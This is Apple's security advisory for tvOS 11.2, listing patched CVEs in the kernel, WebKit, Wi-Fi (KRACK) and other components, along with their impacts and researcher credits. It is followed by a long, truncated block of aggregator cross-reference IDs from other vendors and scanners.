## About Apple security updates
For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.
For more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).
Apple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.

## tvOS 11.2
Released December 4, 2017
**App Store**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An attacker in a privileged network position may be able to spoof password prompts in App Store
Description: An input validation issue was addressed through improved input validation.
CVE-2017-7164: Jerry Decime
Entry added January 11, 2018
**Auto Unlock**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2017-13905: Samuel Groß (@5aelo)
Entry added October 18, 2018
**CFNetwork Session**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with system privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative
Entry added January 22, 2018
**CoreAnimation**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with elevated privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative
Entry added January 22, 2018
**CoreFoundation**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2017-7151: Samuel Groß (@5aelo)
Entry added October 18, 2018
**IOKit**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative
Entry added December 21, 2017, updated January 10, 2018
**IOSurface**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2017-13861: Ian Beer of Google Project Zero
**Kernel**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2017-13904: Kevin Backhouse of Semmle Ltd.
Entry added February 14, 2018
**Kernel**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to read kernel memory (Meltdown)
Description: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.
CVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)
Entry added January 4, 2018, updated January 10, 2018
**Kernel**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2017-13862: Apple
CVE-2017-13867: Ian Beer of Google Project Zero
CVE-2017-13876: Ian Beer of Google Project Zero
Entry updated December 21, 2017
**Kernel**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds checking.
CVE-2017-7173: Brandon Azad
Entry updated August 1, 2018
**Kernel**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to read restricted memory
Description: A type confusion issue was addressed with improved memory handling.
CVE-2017-13855: Jann Horn of Google Project Zero
**Kernel**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: An application may be able to read restricted memory
Description: Multiple validation issues were addressed with improved input sanitization.
CVE-2017-13865: Ian Beer of Google Project Zero
CVE-2017-13868: Brandon Azad
CVE-2017-13869: Jann Horn of Google Project Zero
**Kernel**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: A local user may be able to cause unexpected system termination or read kernel memory
Description: An input validation issue existed in the kernel. This issue was addressed through improved input validation.
CVE-2017-7154: Jann Horn of Google Project Zero
Entry added December 21, 2017
**WebKit**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed with improved memory handling.
CVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative
Entry added January 22, 2018
**WebKit**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed through improved memory handling.
CVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative
Entry added January 22, 2018
**WebKit**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed with improved memory handling.
CVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative
Entry added January 22, 2018
**WebKit**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Visiting a malicious website may lead to user interface spoofing
Description: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.
CVE-2017-7153: Jerry Decime
Entry added January 11, 2018
**WebKit**
Available for: Apple TV 4K and Apple TV (4th generation)
Impact: Processing maliciously crafted web content may lead to arbitrary code execution
Description: Multiple memory corruption issues were addressed with improved memory handling.
CVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab
CVE-2017-7157: an anonymous researcher
CVE-2017-13856: Jeonghoon Shin
CVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative
CVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative
CVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative
Entry updated January 10, 2018
**Wi-Fi**
Available for: Apple TV (4th generation)
Released for Apple TV 4K in [tvOS 11.1](<https://support.apple.com/kb/HT208219>).
Impact: An attacker in Wi-Fi range may force nonce reuse in WPA multicast/GTK clients (Key Reinstallation Attacks - KRACK)
Description: A logic issue existed in the handling of state transitions. This was addressed with improved state management.
CVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven
"OPENVAS:1361412562310812401", "OPENVAS:1361412562310812408", "OPENVAS:1361412562310812662", "OPENVAS:1361412562310812740", "OPENVAS:1361412562310813652", "OPENVAS:1361412562310814014", "OPENVAS:1361412562310815020", "OPENVAS:1361412562310815033", "OPENVAS:1361412562310815034", "OPENVAS:1361412562310843342", "OPENVAS:1361412562310843392", "OPENVAS:1361412562310843405", "OPENVAS:1361412562310843406", "OPENVAS:1361412562310843409", "OPENVAS:1361412562310843410", "OPENVAS:1361412562310843412", "OPENVAS:1361412562310843413", "OPENVAS:1361412562310843414", "OPENVAS:1361412562310843415", "OPENVAS:1361412562310843418", "OPENVAS:1361412562310843423", "OPENVAS:1361412562310843424", "OPENVAS:1361412562310843427", "OPENVAS:1361412562310843429", "OPENVAS:1361412562310843437", "OPENVAS:1361412562310843461", "OPENVAS:1361412562310843473", "OPENVAS:1361412562310843474", "OPENVAS:1361412562310851627", "OPENVAS:1361412562310851632", "OPENVAS:1361412562310851636", "OPENVAS:1361412562310851638", "OPENVAS:1361412562310851654", "OPENVAS:1361412562310851677", "OPENVAS:1361412562310851678", "OPENVAS:1361412562310851693", "OPENVAS:1361412562310851704", "OPENVAS:1361412562310851742", "OPENVAS:1361412562310851978", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310873510", "OPENVAS:1361412562310873515", "OPENVAS:1361412562310873647", "OPENVAS:1361412562310873667", "OPENVAS:1361412562310873699", "OPENVAS:1361412562310873957", "OPENVAS:1361412562310873984", "OPENVAS:1361412562310874059", "OPENVAS:1361412562310874088", "OPENVAS:1361412562310882787", "OPENVAS:1361412562310882788", "OPENVAS:1361412562310882822", "OPENVAS:1361412562310882836", "OPENVAS:1361412562310882855", "OPENVAS:1361412562310882875", "OPENVAS:1361412562310891150", "OPENVAS:1361412562310891232", "OPENVAS:1361412562310891573", "OPENVAS:1361412562311220171241", "OPENVAS:1361412562311220171242", "OPENVAS:1361412562311220181001", "OPENVAS:1361412562311220181002", "OPENVAS:1361412562311220181236", 
"OPENVAS:1361412562311220191414", "OPENVAS:1361412562311220191422", "OPENVAS:1361412562311220191514", "OPENVAS:1361412562311220191539", "OPENVAS:1361412562311220191637", "OPENVAS:1361412562311220191638", "OPENVAS:1361412562311220192274", "OPENVAS:1361412562311220201674"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2018", "ORACLE:CPUAPR2018-3678067", "ORACLE:CPUAPR2019", "ORACLE:CPUAPR2019-5072813", "ORACLE:CPUAPR2020", "ORACLE:CPUJAN2018", "ORACLE:CPUJAN2018-3236628", "ORACLE:CPUJUL2018", "ORACLE:CPUJUL2018-4258247"]}, {"type": "oraclelinux", "idList": ["ELSA-2017-2907", "ELSA-2017-2911", "ELSA-2018-0007", "ELSA-2018-0008", "ELSA-2018-0151", "ELSA-2018-0169", "ELSA-2018-0292", "ELSA-2018-1062", "ELSA-2018-1319", "ELSA-2018-1854", "ELSA-2018-4006", "ELSA-2018-4011", "ELSA-2018-4012", "ELSA-2018-4020", "ELSA-2018-4021", "ELSA-2018-4022", "ELSA-2018-4025", "ELSA-2018-4071", "ELSA-2018-4109", "ELSA-2018-4110", "ELSA-2018-4285", "ELSA-2018-4289", "ELSA-2019-4585", "ELSA-2019-4630", "ELSA-2019-4702", "ELSA-2019-4732", "ELSA-2021-9034"]}, {"type": "osv", "idList": ["OSV:DLA-1150-1", "OSV:DLA-1200-1", "OSV:DLA-1232-1", "OSV:DLA-1573-1", "OSV:DSA-3999-1", "OSV:DSA-4078-1", "OSV:DSA-4082-1", "OSV:DSA-4120-1", "OSV:DSA-4120-2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145363", "PACKETSTORM:145364", "PACKETSTORM:145876", "PACKETSTORM:153148"]}, {"type": "paloalto", "idList": ["PAN-SA-2018-0001"]}, {"type": "photon", "idList": ["PHSA-2018-0010", "PHSA-2018-0097", "PHSA-2018-1.0-0097"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:02EAB5AF6104A4960F7E3B105CD50FA1", "QUALYSBLOG:3ACE52E54FF5FE3EF1B0FC328181FA66", "QUALYSBLOG:832B33D45F45271E91CA6542BC9CFD59", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:BD020D07BF02B0790C62701D997BFD4D", "QUALYSBLOG:C9F2432F760D960CF69CDC55D87263A8", "QUALYSBLOG:D893D4DFB7141FDAD0BE869440074392", "QUALYSBLOG:E761CF659F35F9F5C29FB50D76B98C3E", "QUALYSBLOG:F7C32BA5E6651A8CE3584BB84A88A0C0", 
"QUALYSBLOG:F8AA5B21D90BCDD30391A24D6FD47892"]}, {"type": "redhat", "idList": ["RHSA-2017:2907", "RHSA-2017:2911", "RHSA-2018:0007", "RHSA-2018:0008", "RHSA-2018:0009", "RHSA-2018:0010", "RHSA-2018:0011", "RHSA-2018:0016", "RHSA-2018:0017", "RHSA-2018:0018", "RHSA-2018:0020", "RHSA-2018:0021", "RHSA-2018:0022", "RHSA-2018:0044", "RHSA-2018:0045", "RHSA-2018:0046", "RHSA-2018:0047", "RHSA-2018:0089", "RHSA-2018:0090", "RHSA-2018:0091", "RHSA-2018:0092", "RHSA-2018:0151", "RHSA-2018:0182", "RHSA-2018:0292", "RHSA-2018:0464", "RHSA-2018:0496", "RHSA-2018:0502", "RHSA-2018:0512", "RHSA-2018:0654", "RHSA-2018:1062", "RHSA-2018:1129", "RHSA-2018:1319", "RHSA-2018:1346", "RHSA-2018:1374", "RHSA-2019:1046"]}, {"type": "redhatcve", "idList": ["RH:CVE-2017-13077", "RH:CVE-2017-13080", "RH:CVE-2017-13856", "RH:CVE-2017-13866", "RH:CVE-2017-13870", "RH:CVE-2017-5715", "RH:CVE-2017-5754", "RH:CVE-2017-7156", "RH:CVE-2017-7157", "RH:CVE-2018-19965", "RH:CVE-2018-3620"]}, {"type": "securelist", "idList": ["SECURELIST:7CF4DDEB1B5407DAA24EC25BAA7A9654", "SECURELIST:FC1216FC2096CBEE31E247C19D68BEC5"]}, {"type": "seebug", "idList": ["SSV:96986", "SSV:96989", "SSV:96990", "SSV:96991", "SSV:97059", "SSV:97093"]}, {"type": "slackware", "idList": ["SSA-2017-291-02", "SSA-2018-016-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2017:2755-1", "OPENSUSE-SU-2017:2846-1", "OPENSUSE-SU-2017:2896-1", "OPENSUSE-SU-2017:2905-1", "OPENSUSE-SU-2017:3144-1", "OPENSUSE-SU-2018:0022-1", "OPENSUSE-SU-2018:0023-1", "OPENSUSE-SU-2018:0326-1", "OPENSUSE-SU-2018:0459-1", "OPENSUSE-SU-2018:1274-1", "OPENSUSE-SU-2018:1623-1", "OPENSUSE-SU-2018:3473-1", "OPENSUSE-SU-2020:2053-1", "OPENSUSE-SU-2020:2059-1", "SUSE-SU-2017:2745-1", "SUSE-SU-2017:2752-1", "SUSE-SU-2017:2847-1", "SUSE-SU-2017:2869-1", "SUSE-SU-2017:2908-1", "SUSE-SU-2017:2920-1", "SUSE-SU-2017:3072-1", "SUSE-SU-2017:3074-1", "SUSE-SU-2017:3076-1", "SUSE-SU-2017:3103-1", "SUSE-SU-2017:3106-1", "SUSE-SU-2017:3116-1", "SUSE-SU-2017:3117-1", 
"SUSE-SU-2017:3118-1", "SUSE-SU-2017:3119-1", "SUSE-SU-2017:3120-1", "SUSE-SU-2017:3121-1", "SUSE-SU-2017:3122-1", "SUSE-SU-2017:3123-1", "SUSE-SU-2017:3124-1", "SUSE-SU-2017:3125-1", "SUSE-SU-2017:3126-1", "SUSE-SU-2017:3127-1", "SUSE-SU-2017:3128-1", "SUSE-SU-2017:3129-1", "SUSE-SU-2017:3130-1", "SUSE-SU-2017:3131-1", "SUSE-SU-2017:3132-1", "SUSE-SU-2017:3134-1", "SUSE-SU-2017:3136-1", "SUSE-SU-2017:3139-1", "SUSE-SU-2017:3145-1", "SUSE-SU-2017:3146-1", "SUSE-SU-2017:3147-1", "SUSE-SU-2017:3148-1", "SUSE-SU-2017:3149-1", "SUSE-SU-2017:3150-1", "SUSE-SU-2017:3151-1", "SUSE-SU-2017:3152-1", "SUSE-SU-2017:3153-1", "SUSE-SU-2017:3154-1", "SUSE-SU-2017:3156-1", "SUSE-SU-2017:3157-1", "SUSE-SU-2017:3158-1", "SUSE-SU-2017:3159-1", "SUSE-SU-2017:3160-1", "SUSE-SU-2017:3165-1", "SUSE-SU-2017:3265-1", "SUSE-SU-2017:3267-1", "SUSE-SU-2018:0010-1", "SUSE-SU-2018:0011-1", "SUSE-SU-2018:0012-1", "SUSE-SU-2018:0031-1", "SUSE-SU-2018:0040-1", "SUSE-SU-2018:0069-1", "SUSE-SU-2018:0113-1", "SUSE-SU-2018:0114-1", "SUSE-SU-2018:0115-1", "SUSE-SU-2018:0131-1", "SUSE-SU-2018:0171-1", "SUSE-SU-2018:0180-1", "SUSE-SU-2018:0213-1", "SUSE-SU-2018:0219-1", "SUSE-SU-2018:0438-1", "SUSE-SU-2018:0472-1", "SUSE-SU-2018:0555-1", "SUSE-SU-2018:0601-1", "SUSE-SU-2018:0609-1", "SUSE-SU-2018:0638-1", "SUSE-SU-2018:0678-1", "SUSE-SU-2018:0909-1", "SUSE-SU-2018:1177-1", "SUSE-SU-2018:1181-1", "SUSE-SU-2018:1184-1", "SUSE-SU-2018:1202-1", "SUSE-SU-2018:1203-1", "SUSE-SU-2018:1216-1"]}, {"type": "symantec", "idList": ["SMNTC-102371", "SMNTC-102378", "SMNTC-1426"]}, {"type": "talosblog", "idList": ["TALOSBLOG:6AF8BBB020A686E442B50095CA9B7A36"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:37F5AF86E0886FC0FBDCCE15A1236586"]}, {"type": "thn", "idList": ["THN:29EC2E0BD61CF15B2E756ECA04EDFF50", "THN:58CFE19533148E77597FE0AC59963145", "THN:71C19B8F2C6EDB0AFDA5AA0280A20C00", "THN:788E9312DDA39D9A09855DF379A0FD4D", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:C4C9BC61AD42FB9F46B30ECA56F71393"]}, {"type": 
"threatpost", "idList": ["THREATPOST:0F9EDE9A622A021B9B79C50214D7E8AD", "THREATPOST:590758261828FF8DBC9F74588FAD3DE5", "THREATPOST:6C364316788D445329E5596C5108A157", "THREATPOST:7458AE86ECA810D873D5D35916A93D9F", "THREATPOST:CE89F855271AB3AE3CE8B5B0C141CDC2", "THREATPOST:DB0542CFA474B0D9C91032709EDE296D", "THREATPOST:E454192F36C2E44BAE14AB9B62BE28DB"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "ubuntu", "idList": ["USN-3455-1", "USN-3505-1", "USN-3514-1", "USN-3516-1", "USN-3522-1", "USN-3522-2", "USN-3522-3", "USN-3522-4", "USN-3523-1", "USN-3523-2", "USN-3524-1", "USN-3524-2", "USN-3525-1", "USN-3540-1", "USN-3540-2", "USN-3541-1", "USN-3541-2", "USN-3551-1", "USN-3583-1", "USN-3597-1", "USN-3597-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2017-13080", "UB:CVE-2017-13856", "UB:CVE-2017-13866", "UB:CVE-2017-13870", "UB:CVE-2017-13884", "UB:CVE-2017-13885", "UB:CVE-2017-5729", "UB:CVE-2017-5754", "UB:CVE-2017-7153", "UB:CVE-2017-7156", "UB:CVE-2017-7157", "UB:CVE-2017-7160", "UB:CVE-2017-7165", "UB:CVE-2018-10471", "UB:CVE-2018-19965"]}, {"type": "virtuozzo", "idList": ["VZA-2018-001", "VZA-2018-002", "VZA-2018-003", "VZA-2018-006", "VZA-2018-028", "VZA-2018-029"]}, {"type": "vmware", "idList": ["VMSA-2018-0007", "VMSA-2018-0007.6"]}, {"type": "xen", "idList": ["XSA-254", "XSA-279"]}, {"type": "zdi", "idList": ["ZDI-18-146", "ZDI-18-147", "ZDI-18-148", "ZDI-18-149", "ZDI-18-150", "ZDI-18-151", "ZDI-18-152", "ZDI-18-153", "ZDI-18-154", "ZDI-18-155", "ZDI-18-156"]}, {"type": "zdt", "idList": ["1337DAY-ID-29198", "1337DAY-ID-29199", "1337DAY-ID-29200", "1337DAY-ID-29202", "1337DAY-ID-29460", "1337DAY-ID-29634", "1337DAY-ID-29935", "1337DAY-ID-32059", "1337DAY-ID-32828"]}]}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "aix", "idList": ["SPECTRE_MELTDOWN_ADVISORY.ASC"]}, {"type": "amazon", "idList": ["ALAS-2018-939"]}, {"type": "androidsecurity", "idList": 
["ANDROID:2017-11-01", "ANDROID:2018-05-01", "ANDROID:2018-09-01", "ANDROID:2018-12-01"]}, {"type": "apple", "idList": ["APPLE:05865687B681A94EDACF5CD84F56F0EF", "APPLE:076A5029E1D9073AD8A212C272CBA098", "APPLE:121C0C2C932F899F870D9D5665610ED0", "APPLE:31324259F2722EDCDF4BD19554187E7A", "APPLE:3CD8680715FC8DF4A758CC6012471868", "APPLE:718D8AEEB116992EF0FD8052E050FE9A", "APPLE:A906ED60E2875C343BE4CB7524339858", "APPLE:B3402276360A8C507F94E26E15D465F4", "APPLE:B7AA5B9368DE4BD135A602B017EB0259", "APPLE:B8F16B37FC64788E8894EE9818D392DA", "APPLE:CE1834F14896537612441EAFB62595C9", "APPLE:D5B2B0A52189C378A357D40438F75CF8", "APPLE:F6306C158D7B30BA0A0EDD411C414BFE", "APPLE:FAC8B05FC20C773432450AA689A274D6", "APPLE:FAE8F6548DA345F4466BB73DD8BE2763", "APPLE:HT208219", "APPLE:HT208220", "APPLE:HT208222", "APPLE:HT208258", "APPLE:HT208324", "APPLE:HT208325", "APPLE:HT208326", "APPLE:HT208328", "APPLE:HT208331", "APPLE:HT208334", "APPLE:HT208354", "APPLE:HT208465", "APPLE:HT208692", "APPLE:HT208847"]}, {"type": "archlinux", "idList": ["ASA-201710-22", "ASA-201710-23", "ASA-201801-1", "ASA-201801-4", "ASA-201801-6"]}, {"type": "centos", "idList": ["CESA-2017:2907", "CESA-2018:0007", "CESA-2018:0008", "CESA-2018:1319"]}, {"type": "cert", "idList": ["VU:228519", "VU:584653"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2018-0011"]}, {"type": "cisco", "idList": ["CISCO-SA-20171016-WPA", "CISCO-SA-20180104-CPUSIDECHANNEL"]}, {"type": "citrix", "idList": ["CTX231390", "CTX234679"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:08639CF3E8D6C946D02AFEE0F4B5B0A0", "CFOUNDRY:1A91EDE432C17AF89F8A4DC15F5D5A55", "CFOUNDRY:86B5C35F8F0E334D1CCCDAF1214EDFEF", "CFOUNDRY:8730FEC9F4689F70DBBC5917AC5BF0C6"]}, {"type": "cve", "idList": ["CVE-2017-13080", "CVE-2017-5754"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1150-1:A6833", "DEBIAN:DLA-1200-1:A0B61", "DEBIAN:DLA-1232-1:15F37", "DEBIAN:DSA-3999-1:C5D5F", "DEBIAN:DSA-4078-1:83863", "DEBIAN:DSA-4082-1:57979", "DEBIAN:DSA-4120-1:7BEB7"]}, 
{"type": "debiancve", "idList": ["DEBIANCVE:CVE-2017-13080"]}, {"type": "exploitdb", "idList": ["EDB-ID:44234"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:415A901F9BC5DABDC36EDFC6E3924DAC"]}, {"type": "f5", "idList": ["F5:K23642330", "F5:K91229003"]}, {"type": "fedora", "idList": ["FEDORA:0DD9C604DD0F", "FEDORA:1714A6074A50", "FEDORA:8E50360491B7", "FEDORA:AA0BE60A8642", "FEDORA:B0AFE6075EE6", "FEDORA:F117D6006273", "FEDORA:F21276042F34"]}, {"type": "fortinet", "idList": ["FG-IR-17-196", "FG-IR-18-002"]}, {"type": "freebsd", "idList": ["1CE95BC7-3278-11E8-B527-00012E582166", "74DAA370-2797-11E8-95EC-A4BADB2F4699", "D670A953-B2A1-11E7-A633-009C02A2AB30"]}, {"type": "gentoo", "idList": ["GLSA-201711-03", "GLSA-201801-09"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:37170621F78D33B9DDE68A73E0A16294", "GOOGLEPROJECTZERO:42FBA08807698DC5CD34486014AC8332", "GOOGLEPROJECTZERO:8F5F85400267DF1EFD1897A0E2FF0671"]}, {"type": "hackerone", "idList": ["H1:286740"]}, {"type": "hp", "idList": ["HP:C05843704", "HP:C05869091", "HP:C05872536", "HP:C05876244", "HP:C05963224"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20171117-01-WPA", "HUAWEI-SA-20180106-01-CPU"]}, {"type": "ibm", "idList": ["A594E3179D9A187B5EAE777411B4109CB85600F1AEC96905951B67E4F825EC64"]}, {"type": "ics", "idList": ["ICSA-17-318-01A", "ICSA-17-318-01B", "ICSA-17-318-01C", "ICSA-17-318-02"]}, {"type": "kaspersky", "idList": ["KLA11279"]}, {"type": "kitploit", "idList": ["KITPLOIT:8752367943592764867", "KITPLOIT:8917740741292426205"]}, {"type": "krebs", "idList": ["KREBS:6CB809D95C62C82983AC457CB4B0CBB1"]}, {"type": "lenovo", "idList": ["LENOVO:PS500143-NOSID", "LENOVO:PS500151-NOSID"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:3DDE32E41BE8356C194673EE3ED7FDBE", "MALWAREBYTES:C47D8F4321BF60FB315B6C46B47DF46F"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS"]}, {"type": "mscve", "idList": ["MS:ADV180002", "MS:ADV180018", "MS:CVE-2017-13080"]}, 
{"type": "mskb", "idList": ["KB4467708", "KB4493448"]}, {"type": "myhack58", "idList": ["MYHACK58:62201789609"]}, {"type": "nessus", "idList": ["AIX_IJ03029.NASL", "AIX_IJ03030.NASL", "AIX_IJ03032.NASL", "AIX_IJ03033.NASL", "AIX_IJ03034.NASL", "AIX_IJ03035.NASL", "AIX_IJ03036.NASL", "AL2_ALAS-2018-939.NASL", "ALA_ALAS-2018-939.NASL", "APPLETV_11_2.NASL", "ARUBAOS_KRACK.NASL", "CENTOS_RHSA-2018-0007.NASL", "CENTOS_RHSA-2018-0008.NASL", "CENTOS_RHSA-2018-1319.NASL", "CISCO-SA-20171016-WPA-ASA_WITH_FIREPOWER_SERVICES.NASL", "CITRIX_XENSERVER_CTX231390.NASL", "CITRIX_XENSERVER_CTX234679.NASL", "DEBIAN_DLA-1200.NASL", "DEBIAN_DLA-1232.NASL", "DEBIAN_DSA-3999.NASL", "DEBIAN_DSA-4078.NASL", "DEBIAN_DSA-4082.NASL", "DEBIAN_DSA-4120.NASL", "EULEROS_SA-2017-1241.NASL", "EULEROS_SA-2017-1242.NASL", "EULEROS_SA-2018-1001.NASL", "EULEROS_SA-2018-1002.NASL", "FEDORA_2017-06B373D942.NASL", "FEDORA_2017-0AD0E2F390.NASL", "FEDORA_2017-F45E844A85.NASL", "FEDORA_2018-3199135A7E.NASL", "FEDORA_2018-43712163DE.NASL", "FORTIOS_FG-IR-17-196.NASL", "FREEBSD_PKG_D670A953B2A111E7A633009C02A2AB30.NASL", "GENTOO_GLSA-201711-03.NASL", "GENTOO_GLSA-201801-09.NASL", "INTEL_SA_00101_WLAN.NASL", "ITUNES_12_7_2.NASL", "JUNIPER_JSA10827_KRACK.NASL", "MACOSX_SAFARI11_0_2.NASL", "MACOSX_SECUPD2017-005.NASL", "MACOSX_SECUPD2018-001.NASL", "MACOS_10_13_2.NASL", "NEWSTART_CGSL_NS-SA-2019-0143_KERNEL.NASL", "NVIDIA_UNIX_CVE_2017_5753.NASL", "NVIDIA_WIN_CVE_2017_5753.NASL", "OPENSUSE-2017-1317.NASL", "OPENSUSE-2018-118.NASL", "OPENSUSE-2018-169.NASL", "OPENSUSE-2018-2.NASL", "OPENSUSE-2018-3.NASL", "OPENSUSE-2018-454.NASL", "OPENSUSE-2019-418.NASL", "ORACLELINUX_ELSA-2018-0007.NASL", "ORACLELINUX_ELSA-2018-0008.NASL", "ORACLELINUX_ELSA-2018-1319.NASL", "ORACLELINUX_ELSA-2018-4006.NASL", "ORACLELINUX_ELSA-2018-4011.NASL", "ORACLELINUX_ELSA-2018-4025.NASL", "ORACLELINUX_ELSA-2018-4071.NASL", "ORACLEVM_OVMSA-2018-0005.NASL", "ORACLEVM_OVMSA-2018-0006.NASL", "ORACLEVM_OVMSA-2018-0008.NASL", 
"ORACLEVM_OVMSA-2018-0010.NASL", "ORACLEVM_OVMSA-2018-0015.NASL", "ORACLEVM_OVMSA-2018-0017.NASL", "ORACLEVM_OVMSA-2018-0020.NASL", "ORACLEVM_OVMSA-2018-0021.NASL", "ORACLEVM_OVMSA-2018-0035.NASL", "REDHAT-RHSA-2018-0007.NASL", "REDHAT-RHSA-2018-0008.NASL", "REDHAT-RHSA-2018-0009.NASL", "REDHAT-RHSA-2018-0010.NASL", "REDHAT-RHSA-2018-0011.NASL", "REDHAT-RHSA-2018-0016.NASL", "REDHAT-RHSA-2018-0017.NASL", "REDHAT-RHSA-2018-0018.NASL", "REDHAT-RHSA-2018-0020.NASL", "REDHAT-RHSA-2018-0021.NASL", "REDHAT-RHSA-2018-0022.NASL", "REDHAT-RHSA-2018-0044.NASL", "REDHAT-RHSA-2018-0045.NASL", "REDHAT-RHSA-2018-0046.NASL", "REDHAT-RHSA-2018-0047.NASL", "REDHAT-RHSA-2018-0182.NASL", "REDHAT-RHSA-2018-0292.NASL", "REDHAT-RHSA-2018-1129.NASL", "REDHAT-RHSA-2018-1319.NASL", "REDHAT-RHSA-2018-1346.NASL", "SCREENOS_JSA10827_KRACK.NASL", "SLACKWARE_SSA_2018-016-01.NASL", "SL_20180103_KERNEL_ON_SL6_X.NASL", "SL_20180103_KERNEL_ON_SL7_X.NASL", "SL_20180508_KERNEL_ON_SL6_X.NASL", "SMB_NT_MS17_OCT_WIN2008.NASL", "SUSE_SU-2017-3103-1.NASL", "SUSE_SU-2017-3117-1.NASL", "SUSE_SU-2017-3118-1.NASL", "SUSE_SU-2017-3119-1.NASL", "SUSE_SU-2017-3123-1.NASL", "SUSE_SU-2017-3124-1.NASL", "SUSE_SU-2017-3125-1.NASL", "SUSE_SU-2017-3127-1.NASL", "SUSE_SU-2017-3130-1.NASL", "SUSE_SU-2017-3131-1.NASL", "SUSE_SU-2017-3132-1.NASL", "SUSE_SU-2017-3145-1.NASL", "SUSE_SU-2017-3146-1.NASL", "SUSE_SU-2017-3147-1.NASL", "SUSE_SU-2017-3148-1.NASL", "SUSE_SU-2017-3149-1.NASL", "SUSE_SU-2017-3150-1.NASL", "SUSE_SU-2017-3151-1.NASL", "SUSE_SU-2017-3152-1.NASL", "SUSE_SU-2017-3153-1.NASL", "SUSE_SU-2017-3154-1.NASL", "SUSE_SU-2017-3157-1.NASL", "SUSE_SU-2017-3158-1.NASL", "SUSE_SU-2017-3160-1.NASL", "SUSE_SU-2017-3265-1.NASL", "SUSE_SU-2018-0010-1.NASL", "SUSE_SU-2018-0011-1.NASL", "SUSE_SU-2018-0012-1.NASL", 